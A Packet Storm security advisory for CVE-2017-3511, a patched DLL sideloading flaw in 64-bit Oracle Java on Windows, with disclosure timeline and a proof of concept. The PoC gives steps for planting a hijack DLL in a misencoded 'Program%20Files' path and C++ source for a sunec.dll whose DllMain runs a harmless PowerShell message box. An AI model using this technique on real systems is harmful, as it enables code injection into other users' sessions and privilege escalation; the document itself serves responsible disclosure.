exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Java 64bit DLL Hijacking

Oracle Java 64bit DLL Hijacking
Posted Apr 21, 2017
Authored by Florian Bogner

A code injection through DLL sideloading vulnerability exists in 64-bit Oracle Java.

tags | exploit, java
systems | windows
advisories | CVE-2017-3511
SHA-256 | 4f956101cdf5d276c874cea123fd4623f5a037012bdc72feb00042183a276e5d

Oracle Java 64bit DLL Hijacking

Change Mirror Download
Code Injection through DLL Sideloading in 64bit Oracle Java

Metadata
===================================================
Release Date: 19-March-2017
Author: Florian Bogner // https://bogner.sh
Affected product: 64bit Oracle Java on Windows (https://java.com/en/)
Fixed in: Java SE: 7u131, 8u121; Java SE Embedded: 8u121; JRockit: R28.3.13
Tested on: Windows 7 and Windows 2008R2
CVE: CVE-2017-3511
URL: https://bogner.sh/2017/04/cve-2017-3511-code-injection-through-dll-sideloading-in-64bit-oracle-java
Video: https://youtu.be/bEiC4JLrV_4
Vulnerability Status: Fixed in Oracle Critical Patch Update Advisory - April 2017

Product Description
===================================================
Java is a set of computer software and specifications developed by Sun Microsystems, which was later acquired by the Oracle Corporation, that provides a system for developing application software and deploying it in a cross-platform computing environment. Java is used in a wide variety of computing platforms from embedded devices and mobile phones to enterprise servers and supercomputers.
~https://en.wikipedia.org/wiki/Java_(software_platform)

Vulnerability Description
===================================================
Vulnerable 64bit Oracle Java versions on Windows try to load some of their (crypto) dependencies from the non-existing folder C:\Program%20Files\Java\jre[version]\lib\ext. This is most likely caused by some kind of encoding issue as %20 represents an URL-encoded space. As any local user is allowed to append new folders on the C: driveas root, the Program%20Files folder can be created. Thereby, any local user can place a malicious DLL into C:\Program%20Files\Java\jre1.8.0_101\lib\ext.

Hence, code can be injected into other useras Windows sessions. Additionally if any vulnerable Java application is running as privileged application (SYSTEM, local admin, domain admin) this issue can also be used to escalate oneas permissions vertically.

Suggested Solution
===================================================
Update to the latest version.

Disclosure Timeline
===================================================
8.8.2016: The issues have been documented and reported
10.8.2016: The issue has been confirmed by the vendor
6.12.2016: CVE-2017-3511 has been assigned
19.4.2017: Fix release in Oracleas Critical Patch Update April 2017

PoC
===================================================
1.) Build a "malicious" affected DLL like sunec.dll
2.) Create the folder structure C:\Program%20Files\Java\jre1.8.0_101\lib\ext and place it in there.
3.) Start a vulnerable application (like Burp or Angry IP Scanner)

The following source can be used to build the DLL
#include <process.h>

/*
"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" amd64
cl.exe /D_USRDLL /D_WINDLL sunec.cpp /link /DLL /OUT:sunec.dll
*/

/* export all required functions - use Dependency Walker to check what is needed */
extern "C"
{
__declspec(dllexport) int Java_sun_security_ec_ECDHKeyAgreement_deriveKey();
__declspec(dllexport) int Java_sun_security_ec_ECDSASignature_signDigest();
__declspec(dllexport) int Java_sun_security_ec_ECDSASignature_verifySignedDigest();
__declspec(dllexport) int Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair();
}

/*
Implement DLLMain with common datatypes so we don't have to include windows.h.
*/
int DllMain(void* hinst, unsigned long* reason, void* reserved) {
system("powershell -Command \"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[System.Windows.Forms.MessageBox]::Show('DLL Loaded')\"");
exit(1);
return 0;
}

/* Implement stubs of our exports */
int Java_sun_security_ec_ECDHKeyAgreement_deriveKey() {
return 0;
}

int Java_sun_security_ec_ECDSASignature_signDigest() {
return 0;
}

int Java_sun_security_ec_ECDSASignature_verifySignedDigest() {
return 0;
}

int Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair() {
return 0;
}

Florian Bogner

eMail: florian@bogner.sh
Web: http://www.bogner.sh
LinkedIn: https://www.linkedin.com/profile/view?id=368904276
Xing: https://www.xing.com/profile/Florian_Bogner9



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close